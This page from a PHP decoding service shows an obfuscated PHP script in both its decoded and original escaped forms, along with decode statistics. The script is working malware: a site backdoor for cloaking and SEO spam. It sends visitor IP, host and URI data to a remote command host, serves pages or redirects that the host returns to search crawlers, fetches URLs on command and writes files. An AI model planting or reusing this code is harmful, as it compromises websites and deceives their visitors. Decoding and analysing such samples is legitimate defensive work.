Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto eJsz7RDHed; AqlSVnHlVv: bgfsbDIHmA: WwlROSZwio: if (!(stripos($cntx, "\x6f\x6b..
Decoded Output download
<?php goto eJsz7RDHed; AqlSVnHlVv: bgfsbDIHmA: WwlROSZwio: if (!(stripos($cntx, "ok") === 0)) { goto kna4ftyXSu; } exit($cntx . $db . $gov . $ixv); kna4ftyXSu: goto ZCUCuvMt6W; S2Eqw8ugo2: @header("Location: " . $cntx); exit; Qey1KIm2YV: if (!strstr($cntx, "[,]")) { goto S66KNU1gNP; } $segs = explode("[,]", $cntx); goto fSuZ4sJhf1; Q1YSkncu0m: DsYq_WavgK: oi1q3tIeXm: goto faSPJA9VZZ; zQosCyyt2W: S66KNU1gNP: iEuvh4l16e: if (!@preg_match("#^[^.]*.(txt|php)#i", $cntx)) { goto WwlROSZwio; } $values = explode("[,]", $cntx); todk($values[0], $values[1]); goto ZNL_nI2DdA; zahOakIdFk: $host = $_SERVER["HTTP_HOST"]; $lang = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : ''; $token = isset($_SERVER["HTTP_XDOIM"]) ? $_SERVER["HTTP_XDOIM"] : ''; $proto = !empty($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off" || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https" || !empty($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off" ? "https" : "http"; $header = array("Lang: " . $lang, "User-Agent: " . $ua, "Referer: " . $ur, "Http-Proto: " . $proto, "Http-Host: " . $host, "Http-Uri: " . $uri, "Dbgroup: " . $gov, "Http-X-Forwarded-For: " . $ip, "Token: " . $token); goto Pm47vykUGm; ZCUCuvMt6W: if (!($code >= 400 && $code < 500)) { goto fAxIs24q3X; } @header("HTTP/1.1 404 Not Found"); exit; fAxIs24q3X: if (!($code >= 500)) { goto AoZqDojj53; } goto VCOsTCgpfB; eJsz7RDHed: error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $ixv = "2.2.17"; $gov = "cf.fortuneday.xyz"; goto O2wFc2yWdM; COb2dcVyBu: if (!(stripos($cntx, "<?xml") === 0)) { goto eUTH0InsdK; } @header("Content-type: text/xml"); exit($cntx); eUTH0InsdK: if (!(stripos($cntx, "User-ag") === 0)) { goto DsaTkjv2CD; } goto el04lsBrqu; VCOsTCgpfB: @header("HTTP/1.1 500 Internal Server Error"); exit; AoZqDojj53: if (!($cntx != '')) { goto DsYq_WavgK; } exit($cntx); goto Q1YSkncu0m; O2wFc2yWdM: $db = "1000"; $ip = $_SERVER["REMOTE_ADDR"]; $ur = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; $ua = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''; $uri = $_SERVER["REQUEST_URI"]; goto zahOakIdFk; fSuZ4sJhf1: $lines = explode(",", $segs[0]); $result = ''; foreach ($lines as $url) { list($respbody, $code) = urlx($url, null, null, $segs[1]); $result .= $url . $respbody; AXe5h0TMzs: } LkuX5CVwAy: exit($result); goto zQosCyyt2W; Pm47vykUGm: $postdata = "proto={$proto}&shost={$host}&ip={$ip}&dbgroup={$db}&uri={$uri}"; if (!($uri !== "/favicon.ico" && (@preg_match("#google|yahoo|bing#i", $ua) || @preg_match("#google.co.jp|google.com|yahoo.com|yahoo.co.jp|bing.com#i", $ur) && @preg_match("#[/\?]([a-z0-9]{1})(\d+)#i", $uri)))) { goto oi1q3tIeXm; } list($cntx, $code, $ctype) = urlx("http://" . $gov . "/index?" . $postdata, $header, $postdata); if (!(stripos($ctype, "gzip") > 0)) { goto tXOqxhXF1v; } @header("Content-type: application/x-gzip"); goto vmWYc7Z2Zb; vmWYc7Z2Zb: exit($cntx); tXOqxhXF1v: if (!(stripos($cntx, "<!doct") === 0 || stripos($cntx, "<html") === 0)) { goto rtxe2mhRvB; } exit($cntx); rtxe2mhRvB: goto COb2dcVyBu; ZNL_nI2DdA: if (file_exists($values[0])) { goto g22zXBKWTH; } exit("no false"); goto bgfsbDIHmA; g22zXBKWTH: exit("end ok"); goto AqlSVnHlVv; el04lsBrqu: @header("Content-type: text/plain;charset=utf-8"); exit($cntx); DsaTkjv2CD: if (!(stripos($cntx, "http") === 0)) { goto iEuvh4l16e; } if (!stripos($cntx, "?main_page=")) { goto Qey1KIm2YV; } goto S2Eqw8ugo2; faSPJA9VZZ: function urlx($url, $header = null, $postdata = null, $ua = null) { if (!function_exists("curl_init")) { return; } try { goto D_qmYGcHjD; KnceqyU7MM: curl_close($ch); goto KfRv4HLZkV; PmTfuSD3C2: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $header === null ? '' : curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); if (!($postdata !== null && $postdata !== '')) { goto mS_mJd02b5; } curl_setopt($ch, CURLOPT_POST, 1); goto WiMZNfP3dW; WiMZNfP3dW: curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); mS_mJd02b5: $body = curl_exec($ch); $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); $ctype = curl_getinfo($ch, CURLINFO_CONTENT_TYPE); goto KnceqyU7MM; D_qmYGcHjD: $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_ENCODING, "gzip,deflate"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); goto PmTfuSD3C2; KfRv4HLZkV: } catch (Exception $e) { } return array($body, $code, $ctype); } ?>
Did this file decode correctly?
Original Code
<?php goto eJsz7RDHed; AqlSVnHlVv: bgfsbDIHmA: WwlROSZwio: if (!(stripos($cntx, "\x6f\x6b") === 0)) { goto kna4ftyXSu; } exit($cntx . $db . $gov . $ixv); kna4ftyXSu: goto ZCUCuvMt6W; S2Eqw8ugo2: @header("\114\x6f\x63\x61\164\151\x6f\156\72\40" . $cntx); exit; Qey1KIm2YV: if (!strstr($cntx, "\133\x2c\135")) { goto S66KNU1gNP; } $segs = explode("\x5b\54\x5d", $cntx); goto fSuZ4sJhf1; Q1YSkncu0m: DsYq_WavgK: oi1q3tIeXm: goto faSPJA9VZZ; zQosCyyt2W: S66KNU1gNP: iEuvh4l16e: if (!@preg_match("\43\x5e\133\x5e\56\x5d\x2a\56\50\x74\x78\x74\174\160\x68\160\x29\43\151", $cntx)) { goto WwlROSZwio; } $values = explode("\133\x2c\135", $cntx); todk($values[0], $values[1]); goto ZNL_nI2DdA; zahOakIdFk: $host = $_SERVER["\110\124\124\120\137\110\117\x53\124"]; $lang = isset($_SERVER["\x48\124\124\x50\137\101\103\103\105\120\x54\x5f\x4c\x41\116\x47\x55\101\x47\105"]) ? $_SERVER["\110\x54\x54\120\x5f\101\103\103\105\120\124\137\114\101\x4e\x47\125\x41\x47\105"] : ''; $token = isset($_SERVER["\x48\124\x54\x50\x5f\130\104\117\x49\x4d"]) ? $_SERVER["\110\x54\x54\120\x5f\x58\x44\117\x49\115"] : ''; $proto = !empty($_SERVER["\x48\x54\x54\x50\123"]) && strtolower($_SERVER["\x48\124\124\120\x53"]) !== "\x6f\146\146" || isset($_SERVER["\x48\124\x54\120\x5f\x58\137\106\117\x52\x57\x41\122\x44\x45\x44\x5f\x50\122\117\124\117"]) && $_SERVER["\x48\x54\124\120\137\x58\137\106\117\122\127\x41\x52\104\x45\x44\x5f\120\122\x4f\124\117"] === "\150\x74\x74\160\163" || !empty($_SERVER["\x48\x54\124\120\x5f\x46\x52\x4f\x4e\124\x5f\105\116\104\x5f\x48\x54\124\x50\x53"]) && strtolower($_SERVER["\110\124\x54\x50\137\106\x52\117\x4e\x54\137\x45\116\104\137\x48\124\124\x50\123"]) !== "\x6f\x66\146" ? "\150\164\x74\160\x73" : "\x68\x74\x74\160"; $header = array("\x4c\141\156\147\72\x20" . $lang, "\125\x73\145\162\55\101\x67\145\156\x74\72\x20" . $ua, "\x52\145\146\145\x72\145\162\72\x20" . $ur, "\110\x74\x74\x70\55\120\162\x6f\164\x6f\72\x20" . $proto, "\x48\x74\164\160\55\110\x6f\x73\x74\72\40" . $host, "\x48\x74\164\x70\x2d\125\x72\x69\x3a\40" . $uri, "\104\142\147\162\x6f\x75\160\72\x20" . $gov, "\110\164\164\160\x2d\x58\x2d\106\157\162\x77\x61\x72\x64\145\x64\55\106\157\x72\72\40" . $ip, "\x54\157\x6b\x65\156\72\40" . $token); goto Pm47vykUGm; ZCUCuvMt6W: if (!($code >= 400 && $code < 500)) { goto fAxIs24q3X; } @header("\110\x54\124\x50\57\x31\x2e\x31\40\x34\x30\64\40\x4e\x6f\164\x20\106\157\x75\156\144"); exit; fAxIs24q3X: if (!($code >= 500)) { goto AoZqDojj53; } goto VCOsTCgpfB; eJsz7RDHed: error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $ixv = "\x32\56\x32\56\61\67"; $gov = "\x63\146\x2e\146\x6f\162\x74\165\x6e\145\x64\141\x79\56\x78\171\x7a"; goto O2wFc2yWdM; COb2dcVyBu: if (!(stripos($cntx, "\74\77\170\x6d\x6c") === 0)) { goto eUTH0InsdK; } @header("\103\157\x6e\164\x65\156\164\x2d\164\x79\160\x65\72\x20\164\145\170\164\57\x78\x6d\x6c"); exit($cntx); eUTH0InsdK: if (!(stripos($cntx, "\125\x73\145\162\x2d\x61\x67") === 0)) { goto DsaTkjv2CD; } goto el04lsBrqu; VCOsTCgpfB: @header("\110\124\x54\x50\x2f\x31\x2e\61\x20\x35\60\x30\x20\111\156\164\145\x72\x6e\x61\x6c\x20\x53\145\x72\166\145\x72\x20\105\162\x72\157\x72"); exit; AoZqDojj53: if (!($cntx != '')) { goto DsYq_WavgK; } exit($cntx); goto Q1YSkncu0m; O2wFc2yWdM: $db = "1000"; $ip = $_SERVER["\122\105\x4d\117\124\x45\137\x41\x44\x44\122"]; $ur = isset($_SERVER["\x48\x54\x54\120\x5f\x52\x45\x46\x45\122\x45\x52"]) ? $_SERVER["\x48\124\124\120\137\122\105\x46\x45\x52\x45\122"] : ''; $ua = isset($_SERVER["\110\x54\x54\x50\x5f\125\123\105\122\x5f\x41\107\105\x4e\124"]) ? $_SERVER["\110\x54\124\120\x5f\125\123\105\122\x5f\x41\x47\x45\116\124"] : ''; $uri = $_SERVER["\122\x45\121\x55\x45\x53\124\x5f\x55\122\111"]; goto zahOakIdFk; fSuZ4sJhf1: $lines = explode("\54", $segs[0]); $result = ''; foreach ($lines as $url) { list($respbody, $code) = urlx($url, null, null, $segs[1]); $result .= $url . $respbody; AXe5h0TMzs: } LkuX5CVwAy: exit($result); goto zQosCyyt2W; Pm47vykUGm: $postdata = "\160\x72\157\x74\x6f\75{$proto}\46\x73\150\157\x73\x74\x3d{$host}\46\151\x70\x3d{$ip}\x26\144\142\147\x72\x6f\165\160\x3d{$db}\46\165\162\x69\75{$uri}"; if (!($uri !== "\x2f\x66\141\x76\x69\x63\157\x6e\56\151\143\157" && (@preg_match("\x23\147\157\x6f\x67\154\x65\x7c\171\x61\150\157\157\174\142\151\156\x67\43\151", $ua) || @preg_match("\x23\x67\x6f\x6f\147\x6c\x65\56\x63\157\x2e\x6a\160\x7c\x67\157\x6f\x67\154\x65\56\143\157\x6d\x7c\x79\x61\150\157\157\x2e\x63\x6f\155\x7c\171\141\150\157\x6f\56\x63\157\x2e\152\160\174\x62\151\156\147\x2e\143\x6f\x6d\43\x69", $ur) && @preg_match("\x23\133\x2f\134\77\135\x28\x5b\141\x2d\x7a\x30\55\71\x5d\173\61\175\51\x28\134\x64\x2b\51\43\151", $uri)))) { goto oi1q3tIeXm; } list($cntx, $code, $ctype) = urlx("\150\x74\164\160\x3a\x2f\x2f" . $gov . "\x2f\151\x6e\x64\x65\x78\x3f" . $postdata, $header, $postdata); if (!(stripos($ctype, "\147\x7a\151\x70") > 0)) { goto tXOqxhXF1v; } @header("\x43\157\x6e\164\145\156\164\x2d\164\x79\160\145\x3a\x20\x61\x70\x70\154\x69\143\141\x74\151\157\x6e\x2f\170\x2d\x67\x7a\x69\160"); goto vmWYc7Z2Zb; vmWYc7Z2Zb: exit($cntx); tXOqxhXF1v: if (!(stripos($cntx, "\x3c\41\x64\157\x63\164") === 0 || stripos($cntx, "\x3c\x68\164\155\x6c") === 0)) { goto rtxe2mhRvB; } exit($cntx); rtxe2mhRvB: goto COb2dcVyBu; ZNL_nI2DdA: if (file_exists($values[0])) { goto g22zXBKWTH; } exit("\x6e\x6f\x20\x66\x61\154\163\145"); goto bgfsbDIHmA; g22zXBKWTH: exit("\x65\156\x64\x20\x6f\153"); goto AqlSVnHlVv; el04lsBrqu: @header("\103\x6f\x6e\x74\145\x6e\x74\x2d\164\171\160\145\72\x20\x74\x65\x78\164\x2f\160\154\x61\151\156\x3b\x63\x68\141\162\163\x65\164\x3d\165\164\146\55\x38"); exit($cntx); DsaTkjv2CD: if (!(stripos($cntx, "\150\164\x74\160") === 0)) { goto iEuvh4l16e; } if (!stripos($cntx, "\x3f\155\x61\x69\156\137\x70\x61\147\x65\75")) { goto Qey1KIm2YV; } goto S2Eqw8ugo2; faSPJA9VZZ: function urlx($url, $header = null, $postdata = null, $ua = null) { if (!function_exists("\143\165\x72\x6c\x5f\x69\156\151\x74")) { return; } try { goto D_qmYGcHjD; KnceqyU7MM: curl_close($ch); goto KfRv4HLZkV; PmTfuSD3C2: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $header === null ? '' : curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); if (!($postdata !== null && $postdata !== '')) { goto mS_mJd02b5; } curl_setopt($ch, CURLOPT_POST, 1); goto WiMZNfP3dW; WiMZNfP3dW: curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); mS_mJd02b5: $body = curl_exec($ch); $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); $ctype = curl_getinfo($ch, CURLINFO_CONTENT_TYPE); goto KnceqyU7MM; D_qmYGcHjD: $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_ENCODING, "\x67\x7a\x69\x70\54\x64\x65\146\x6c\x61\164\145"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); goto PmTfuSD3C2; KfRv4HLZkV: } catch (Exception $e) { } return array($body, $code, $ctype); } ?>
Function Calls
None |
Stats
MD5 | 9e923a6a9fd22773dbf36584108718e6 |
Eval Count | 0 |
Decode Time | 74 ms |